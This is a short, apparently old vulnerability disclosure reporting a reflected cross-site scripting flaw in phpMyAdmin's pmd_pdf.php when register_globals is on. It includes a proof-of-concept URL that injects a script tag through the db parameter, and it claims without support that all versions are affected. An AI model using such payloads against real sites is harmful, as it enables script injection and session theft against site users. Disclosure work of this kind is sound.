XSS in phpMyadmin
Author : Hadi Kiamarsi
-------------------------------------------
Discovered by : Hadi Kiamarsi
-------------------------------------------
Exploited By : Hadi Kiamarsi
-------------------------------------------
E-Mail : hadikiamarsi[at]hotmail.com
-------------------------------------------
web site : www.ircrash.com
-------------------------------------------
members team : Hadi Kiamarsi - khashayar fereidani - sina yazdanmehr
-------------------------------------------
Sript Name : phpmyadmin ( All version )
Download Script :
http://prdownloads.sourceforge.net/phpmyadmin/phpMyAdmin-3.0.0-all-languages.zip?download
-------------------------------------------
XSS
Exploit :
register_globals=on
query :
http://[www.example.com]/pmd_pdf.php?db=>"><script>alert('Hadi-Kiamarsi')</script>